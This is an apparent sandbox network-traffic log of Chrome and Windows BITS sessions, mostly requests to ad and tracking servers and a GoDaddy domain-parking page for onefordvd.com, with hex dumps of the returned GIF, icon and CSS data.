2024-08-29 15:12:21 UTC | 43 | IN | Data Raw: 47 49 46 38 39 61 01 00 01 00 80 01 00 00 00 00 ff ff ff 21 f9 04 01 00 00 01 00 2c 00 00 00 00 01 00 01 00 00 02 02 4c 01 00 3b
Data Ascii: GIF89a!,L;


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.5 | 53762 | 104.26.2.70 | 443 | 4040 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2024-08-29 15:12:20 UTC | 350 | OUT | GET /px.gif?ch=2 HTTP/1.1
Host: ad-delivery.net
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Accept: */*
Sec-Fetch-Site: none
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
2024-08-29 15:12:21 UTC | 1222 | IN | HTTP/1.1 200 OK
Date: Thu, 29 Aug 2024 15:12:21 GMT
Content-Type: image/gif
Content-Length: 43
Connection: close
X-GUploader-UploadID: ABPtcPpGQj4M5XWsw0_afNd_e9OGg14LZRJ1uEm-mT1UqcHm2kBDuQd0t4vHO2_h4el5IlQxZBc
x-goog-generation: 1620242732037093
x-goog-metageneration: 5
x-goog-stored-content-encoding: identity
x-goog-stored-content-length: 43
x-goog-hash: crc32c=cpEfJQ==
x-goog-hash: md5=rUsPYG4PhGW8TEwXCzfhow==
x-goog-storage-class: MULTI_REGIONAL
Access-Control-Allow-Origin: *
Access-Control-Expose-Headers: *, Content-Length, Date, Server, Transfer-Encoding, X-GUploader-UploadID, X-Google-Trace
Expires: Fri, 30 Aug 2024 15:12:21 GMT
Cache-Control: public, max-age=86400
Age: 777190
Last-Modified: Wed, 05 May 2021 19:25:32 GMT
ETag: "ad4b0f606e0f8465bc4c4c170b37e1a3"
CF-Cache-Status: HIT
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mwOkJ0dQM65ctMHRDNpRMma4oCmSFKMIHAxKkDcnARIV%2FM9Oq9NN2G%2BgGQCL1V2U2rJZZuv2MZ%2BjksRasnLjuhSEQKWECcXTpqYgTZXDOfg74unzvpbh2j7dmz2jHvJjkA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8bad7a9338914358-EWR
2024-08-29 15:12:21 UTC | 43 | IN | Data Raw: 47 49 46 38 39 61 01 00 01 00 80 01 00 00 00 00 ff ff ff 21 f9 04 01 00 00 01 00 2c 00 00 00 00 01 00 01 00 00 02 02 4c 01 00 3b
Data Ascii: GIF89a!,L;


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.5 | 53765 | 104.26.2.70 | 443 | 4040 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2024-08-29 15:12:20 UTC | 371 | OUT | GET /px.gif?ch=1&e=0.7550573385120041 HTTP/1.1
Host: ad-delivery.net
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Accept: */*
Sec-Fetch-Site: none
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
2024-08-29 15:12:21 UTC | 1218 | IN | HTTP/1.1 200 OK
Date: Thu, 29 Aug 2024 15:12:21 GMT
Content-Type: image/gif
Content-Length: 43
Connection: close
X-GUploader-UploadID: ABPtcPpGQj4M5XWsw0_afNd_e9OGg14LZRJ1uEm-mT1UqcHm2kBDuQd0t4vHO2_h4el5IlQxZBc
x-goog-generation: 1620242732037093
x-goog-metageneration: 5
x-goog-stored-content-encoding: identity
x-goog-stored-content-length: 43
x-goog-hash: crc32c=cpEfJQ==
x-goog-hash: md5=rUsPYG4PhGW8TEwXCzfhow==
x-goog-storage-class: MULTI_REGIONAL
Access-Control-Allow-Origin: *
Access-Control-Expose-Headers: *, Content-Length, Date, Server, Transfer-Encoding, X-GUploader-UploadID, X-Google-Trace
Expires: Fri, 30 Aug 2024 15:12:21 GMT
Cache-Control: public, max-age=86400
Age: 777787
Last-Modified: Wed, 05 May 2021 19:25:32 GMT
ETag: "ad4b0f606e0f8465bc4c4c170b37e1a3"
CF-Cache-Status: HIT
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6VUU4zYT07dxb7iGfETemQx0vLYrVnEdXgqzew7BQk7DrIMWVEb9f0ORG0nAM2wmQ2ayicIc3MukGeeq80Yc8png1rUfzc3iRTRPUCNWUqMa7DEV28e%2FQWaqaKPjtJ6mMg%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8bad7a937c5242fe-EWR
2024-08-29 15:12:21 UTC | 43 | IN | Data Raw: 47 49 46 38 39 61 01 00 01 00 80 01 00 00 00 00 ff ff ff 21 f9 04 01 00 00 01 00 2c 00 00 00 00 01 00 01 00 00 02 02 4c 01 00 3b
Data Ascii: GIF89a!,L;


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.5 | 53760 | 184.28.90.27 | 443 | | 
Timestamp | Bytes transferred | Direction | Data
2024-08-29 15:12:20 UTC | 161 | OUT | HEAD /fs/windows/config.json HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
User-Agent: Microsoft BITS/7.8
Host: fs.microsoft.com
2024-08-29 15:12:21 UTC | 467 | IN | HTTP/1.1 200 OK
Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
Content-Type: application/octet-stream
ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
Last-Modified: Tue, 16 May 2017 22:58:00 GMT
Server: ECAcc (lpl/EF06)
X-CID: 11
X-Ms-ApiVersion: Distribute 1.2
X-Ms-Region: prod-weu-z1
Cache-Control: public, max-age=152672
Date: Thu, 29 Aug 2024 15:12:21 GMT
Connection: close
X-CID: 2


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.5 | 53764 | 142.250.186.166 | 443 | 4040 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2024-08-29 15:12:21 UTC | 501 | OUT | GET /favicon.ico?ad=300x250&ad_box_=1&adnet=1&showad=1&size=250x250 HTTP/1.1
Host: ad.doubleclick.net
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Accept: */*
X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlqHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUX
Sec-Fetch-Site: none
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
2024-08-29 15:12:21 UTC | 746 | IN | HTTP/1.1 200 OK
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="ads-doubleclick-media"
Report-To: {"group":"ads-doubleclick-media","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/ads-doubleclick-media"}]}
Content-Length: 1078
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 0
Date: Wed, 28 Aug 2024 23:35:33 GMT
Expires: Thu, 29 Aug 2024 23:35:33 GMT
Cache-Control: public, max-age=86400
Last-Modified: Tue, 08 May 2012 13:08:06 GMT
Content-Type: image/x-icon
Vary: Accept-Encoding
Age: 56208
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Connection: close
2024-08-29 15:12:21 UTC | 644 | IN | Data Raw: 00 00 01 00 02 00 10 10 10 00 00 00 00 00 28 01 00 00 26 00 00 00 20 20 10 00 00 00 00 00 e8 02 00 00 4e 01 00 00 28 00 00 00 10 00 00 00 20 00 00 00 01 00 04 00 00 00 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11
Data Ascii: (& N(
2024-08-29 15:12:21 UTC | 434 | IN | Data Raw: 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11
Data Ascii:


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.5 | 53770 | 104.26.2.70 | 443 | 4040 | C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp | Bytes transferred | Direction | Data
2024-08-29 15:12:21 UTC | 451 | OUT | GET /px.gif?ch=2 HTTP/1.1
    Host: ad-delivery.net
    Connection: keep-alive
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
    Accept: */*
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
    If-None-Match: "ad4b0f606e0f8465bc4c4c170b37e1a3"
    If-Modified-Since: Wed, 05 May 2021 19:25:32 GMT
2024-08-29 15:12:21 UTC | 1167 | IN | HTTP/1.1 304 Not Modified
    Date: Thu, 29 Aug 2024 15:12:21 GMT
    Connection: close
    X-GUploader-UploadID: ABPtcPpGQj4M5XWsw0_afNd_e9OGg14LZRJ1uEm-mT1UqcHm2kBDuQd0t4vHO2_h4el5IlQxZBc
    x-goog-generation: 1620242732037093
    x-goog-metageneration: 5
    x-goog-stored-content-encoding: identity
    x-goog-stored-content-length: 43
    x-goog-hash: crc32c=cpEfJQ==
    x-goog-hash: md5=rUsPYG4PhGW8TEwXCzfhow==
    x-goog-storage-class: MULTI_REGIONAL
    Access-Control-Allow-Origin: *
    Access-Control-Expose-Headers: *, Content-Length, Date, Server, Transfer-Encoding, X-GUploader-UploadID, X-Google-Trace
    Expires: Fri, 30 Aug 2024 15:12:21 GMT
    Cache-Control: public, max-age=86400
    Age: 777793
    Last-Modified: Wed, 05 May 2021 19:25:32 GMT
    ETag: "ad4b0f606e0f8465bc4c4c170b37e1a3"
    CF-Cache-Status: HIT
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Rt1gl5n7e%2FZ7nbqrFn60SXHZYH5VIxN%2BzaaOvNk3zHc3wiMri41UBwRAhqXg3WqarY345G1EVssQTNWLICDxZU8mPkU5l8Wu%2BPBDyOh6TJeQYYoErX%2BQ7k8VWfjHH95Wgg%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8bad7a96f9851a1b-EWR


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.5 | 53769 | 142.250.184.238 | 443 | 4040 | C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp | Bytes transferred | Direction | Data
2024-08-29 15:12:21 UTC | 1311 | OUT | GET /afs/ads?adsafe=low&adtest=off&psid=7621175430&pcsa=false&channel=06902&domain_name=onefordvd.com&client=dp-namemedia06_3ph&r=m&rpbu=https%3A%2F%2Fwww.onefordvd.com%2Flander&type=3&uiopt=true&swp=as-drid-2412708874333548&oe=UTF-8&ie=UTF-8&fexp=21404%2C17301431%2C17301433%2C17301436%2C17301511%2C17301516%2C17301266&format=r3&nocache=1741724944339990&num=0&output=afd_ads&v=3&bsl=8&pac=0&u_his=1&u_tz=-240&dt=1724944339992&u_w=1280&u_h=1024&biw=1280&bih=907&psw=1280&psh=907&frm=0&uio=-&cont=relatedLinks&drt=0&jsid=caf&nfp=1&jsv=667606770&rurl=https%3A%2F%2Fwww.onefordvd.com%2Flander&referer=http%3A%2F%2Fwww.onefordvd.com%2F HTTP/1.1
    Host: syndicatedsearch.goog
    Connection: keep-alive
    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Sec-Fetch-Site: cross-site
    Sec-Fetch-Mode: navigate
    Sec-Fetch-Dest: iframe
    Referer: https://www.onefordvd.com/
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
2024-08-29 15:12:22 UTC | 807 | IN | HTTP/1.1 200 OK
    Content-Type: text/html; charset=UTF-8
    Content-Disposition: inline
    Date: Thu, 29 Aug 2024 15:12:21 GMT
    Expires: Thu, 29 Aug 2024 15:12:21 GMT
    Cache-Control: private, max-age=3600
    Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-vXe7uCHW6iuElNP7b7BtzA' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other
    Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
    Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/other"}]}
    Server: gws
    X-XSS-Protection: 0
    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
    Accept-Ranges: none
    Vary: Accept-Encoding
    Connection: close
    Transfer-Encoding: chunked


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.5 | 53772 | 54.174.215.77 | 443 | 4040 | C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp | Bytes transferred | Direction | Data
2024-08-29 15:12:21 UTC | 423 | OUT | GET /v1/domains/domain?domain=www.onefordvd.com&portfolioId=&abp=1&gdabp=true HTTP/1.1
    Host: api.aws.parking.godaddy.com
    Connection: keep-alive
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
    Accept: */*
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
2024-08-29 15:12:21 UTC | 731 | IN | HTTP/1.1 200 OK
    Date: Thu, 29 Aug 2024 15:12:21 GMT
    Content-Type: application/json
    Content-Length: 985
    Connection: close
    Set-Cookie: AWSALB=/PACIG2Rh6Q/vGV0NBgbuS+lsVrP73uW1UI165tCgsOir5+lVfSc3EOE5/KF97HJfLMGGXb9HIFU+Y51hWb4VljWkM3MbSWgVL4GN8m3RW3wbck9VtczOnvRWDlA; Expires=Thu, 05 Sep 2024 15:12:21 GMT; Path=/
    Set-Cookie: AWSALBCORS=/PACIG2Rh6Q/vGV0NBgbuS+lsVrP73uW1UI165tCgsOir5+lVfSc3EOE5/KF97HJfLMGGXb9HIFU+Y51hWb4VljWkM3MbSWgVL4GN8m3RW3wbck9VtczOnvRWDlA; Expires=Thu, 05 Sep 2024 15:12:21 GMT; Path=/; SameSite=None; Secure
    cache-control: Private,max-age=86400
    set-cookie: cpvisitor=f491361e-23b1-46ad-b955-49e64997c4da; Path=/; Expires=Sat, 28 Sep 2024 15:12:21 GMT; Secure; SameSite=None
    x-request-id: LsC5yTyu
2024-08-29 15:12:21 UTC | 985 | IN | Data Ascii: {"system":"SN","account":"11d1def534ea1be0X4316293fX15bcbce510bXX2f8e ","customerId":"00000000-0000-0000-0000-000000000000","displayType":"ADS","dataSource":"INVENTORY","adSense":{"drid":"as-drid-2412708874333548","channel":"06902","pubId":"dp-namemedia06


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.5 | 53773 | 184.28.90.27 | 443 | | 

Timestamp | Bytes transferred | Direction | Data
2024-08-29 15:12:21 UTC | 239 | OUT | GET /fs/windows/config.json HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    Accept-Encoding: identity
    If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
    Range: bytes=0-2147483646
    User-Agent: Microsoft BITS/7.8
    Host: fs.microsoft.com
2024-08-29 15:12:22 UTC | 515 | IN | HTTP/1.1 200 OK
    ApiVersion: Distribute 1.1
    Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
    Content-Type: application/octet-stream
    ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
    Last-Modified: Tue, 16 May 2017 22:58:00 GMT
    Server: ECAcc (lpl/EF06)
    X-CID: 11
    X-Ms-ApiVersion: Distribute 1.2
    X-Ms-Region: prod-weu-z1
    Cache-Control: public, max-age=152624
    Date: Thu, 29 Aug 2024 15:12:22 GMT
    Content-Length: 55
    Connection: close
    X-CID: 2
2024-08-29 15:12:22 UTC | 55 | IN | Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          21192.168.2.553774142.250.184.2384434040C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-08-29 15:12:22 UTC1311OUTGET /afs/ads?adsafe=low&adtest=off&psid=7621175430&pcsa=false&channel=06902&domain_name=onefordvd.com&client=dp-namemedia06_3ph&r=m&rpbu=https%3A%2F%2Fwww.onefordvd.com%2Flander&type=3&uiopt=true&swp=as-drid-2412708874333548&oe=UTF-8&ie=UTF-8&fexp=21404%2C17301431%2C17301433%2C17301436%2C17301511%2C17301516%2C17301266&format=r3&nocache=2721724944340427&num=0&output=afd_ads&v=3&bsl=8&pac=0&u_his=1&u_tz=-240&dt=1724944340430&u_w=1280&u_h=1024&biw=1280&bih=907&psw=1280&psh=907&frm=0&uio=-&cont=relatedLinks&drt=0&jsid=caf&nfp=1&jsv=667606770&rurl=https%3A%2F%2Fwww.onefordvd.com%2Flander&referer=http%3A%2F%2Fwww.onefordvd.com%2F HTTP/1.1
                                                                          Host: syndicatedsearch.goog
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Upgrade-Insecure-Requests: 1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Sec-Fetch-Site: cross-site
                                                                          Sec-Fetch-Mode: navigate
                                                                          Sec-Fetch-Dest: iframe
                                                                          Referer: https://www.onefordvd.com/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2024-08-29 15:12:22 UTC | 807 | IN | HTTP/1.1 200 OK
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Content-Disposition: inline
                                                                          Date: Thu, 29 Aug 2024 15:12:22 GMT
                                                                          Expires: Thu, 29 Aug 2024 15:12:22 GMT
                                                                          Cache-Control: private, max-age=3600
                                                                          Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-VLYVxzJZmyy0LjD7iG7q8A' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other
                                                                          Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                          Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/other"}]}
                                                                          Server: gws
                                                                          X-XSS-Protection: 0
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Accept-Ranges: none
                                                                          Vary: Accept-Encoding
                                                                          Connection: close
                                                                          Transfer-Encoding: chunked
                                                                          2024-08-29 15:12:22 UTC583INData Raw: 33 35 31 62 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 20 3c 68 65 61 64 3e 20 3c 73 74 79 6c 65 20 69 64 3d 22 73 73 72 2d 62 6f 69 6c 65 72 70 6c 61 74 65 22 3e 62 6f 64 79 7b 2d 77 65 62 6b 69 74 2d 74 65 78 74 2d 73 69 7a 65 2d 61 64 6a 75 73 74 3a 31 30 30 25 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 20 6d 61 72 67 69 6e 3a 30 3b 7d 2e 64 69 76 7b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 66 6c 65 78 3a 30 20 30 3b 20 2d 77 65 62 6b 69 74 2d 66 6c 65 78 2d 73 68 72 69 6e 6b 3a 30 3b 20 66 6c 65 78 2d 73 68 72 69 6e 6b 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 25 3b 7d 2e 73 70 61 6e 3a 6c 61 73 74 2d 63 68 69 6c 64 2c 20 2e 64 69 76 3a 6c 61 73
                                                                          Data Ascii: 351b<!doctype html><html lang="en"> <head> <style id="ssr-boilerplate">body{-webkit-text-size-adjust:100%; font-family:arial,sans-serif; margin:0;}.div{-webkit-box-flex:0 0; -webkit-flex-shrink:0; flex-shrink:0;max-width:100%;}.span:last-child, .div:las
                                                                          2024-08-29 15:12:22 UTC1390INData Raw: 69 5f 7b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 20 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 62 6f 78 3b 20 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 66 6c 65 78 3b 20 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 6d 73 2d 66 6c 65 78 2d 61 6c 69 67 6e 3a 73 74 61 72 74 3b 20 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 61 6c 69 67 6e 3a 73 74 61 72 74 3b 20 2d 77 65 62 6b 69 74 2d 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 66 6c 65 78 2d 73 74 61 72 74 3b 20 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 66 6c 65 78 2d 73 74 61 72 74 3b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 20 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 7d 2e 76 5f 7b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 66 6c 65 78 3a 31 20 30 3b 20 2d 77 65 62 6b 69 74
                                                                          Data Ascii: i_{display:-ms-flexbox; display:-webkit-box; display:-webkit-flex; display:flex;-ms-flex-align:start; -webkit-box-align:start; -webkit-align-items:flex-start; align-items:flex-start;box-sizing:border-box; overflow:hidden;}.v_{-webkit-box-flex:1 0; -webkit
                                                                          2024-08-29 15:12:22 UTC1390INData Raw: 5f 7b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 7d 2e 6f 5f 7b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 7d 2e 78 5f 7b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 3b 7d 2e 79 5f 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 7a 2d 69 6e 64 65 78 3a 31 3b 7d 2e 6b 5f 3e 64 69 76 3a 6e 6f 74 28 2e 79 5f 29 20 7b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 69 6e 6c 69 6e 65 2d 62 6f 78 3b 20 64 69 73 70 6c 61 79 3a 2d 6d 6f 7a 2d 69 6e 6c 69 6e 65 2d 62 6f 78 3b 20 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 69 6e 6c 69 6e 65 2d 66 6c 65 78 62 6f 78 3b 20 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 69 6e 6c 69 6e 65 2d 66 6c 65 78 3b 20 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 66
                                                                          Data Ascii: _{overflow:hidden;}.o_{white-space:nowrap;}.x_{cursor:pointer;}.y_{display:none; position:absolute; z-index:1;}.k_>div:not(.y_) {display:-webkit-inline-box; display:-moz-inline-box; display:-ms-inline-flexbox; display:-webkit-inline-flex; display:inline-f
                                                                          2024-08-29 15:12:22 UTC1390INData Raw: 73 74 61 72 74 3b 20 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 66 6c 65 78 2d 73 74 61 72 74 3b 7d 2e 66 6c 65 78 41 6c 69 67 6e 42 6f 74 74 6f 6d 7b 2d 6d 73 2d 66 6c 65 78 2d 61 6c 69 67 6e 3a 65 6e 64 3b 20 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 61 6c 69 67 6e 3a 65 6e 64 3b 20 2d 77 65 62 6b 69 74 2d 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 66 6c 65 78 2d 65 6e 64 3b 20 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 66 6c 65 78 2d 65 6e 64 3b 7d 2e 66 6c 65 78 41 6c 69 67 6e 43 65 6e 74 65 72 7b 2d 6d 73 2d 66 6c 65 78 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 20 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 20 2d 77 65 62 6b 69 74 2d 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 20 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72
                                                                          Data Ascii: start; align-items:flex-start;}.flexAlignBottom{-ms-flex-align:end; -webkit-box-align:end; -webkit-align-items:flex-end; align-items:flex-end;}.flexAlignCenter{-ms-flex-align:center; -webkit-box-align:center; -webkit-align-items:center; align-items:center
                                                                          2024-08-29 15:12:22 UTC1390INData Raw: 6e 6b 3a 31 3b 20 66 6c 65 78 2d 73 68 72 69 6e 6b 3a 31 3b 7d 2e 73 69 31 30 32 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 31 36 70 78 3b 77 69 64 74 68 3a 33 32 70 78 3b 7d 2e 73 69 31 33 33 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 31 64 32 61 33 33 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 32 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 35 70 78 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 31 30 70 78 3b 63 6f 6c 6f 72 3a 23 64 64 64 64 64 64 3b 7d 2e 73 69 31 33 35 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 31 64 32 61 33 33 3b 68 65 69 67 68 74 3a 31 30 30 25 3b 7d 2e 73 69 31 34 33 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 31 32 70 78 3b 77 69 64 74 68 3a 32 34 70 78
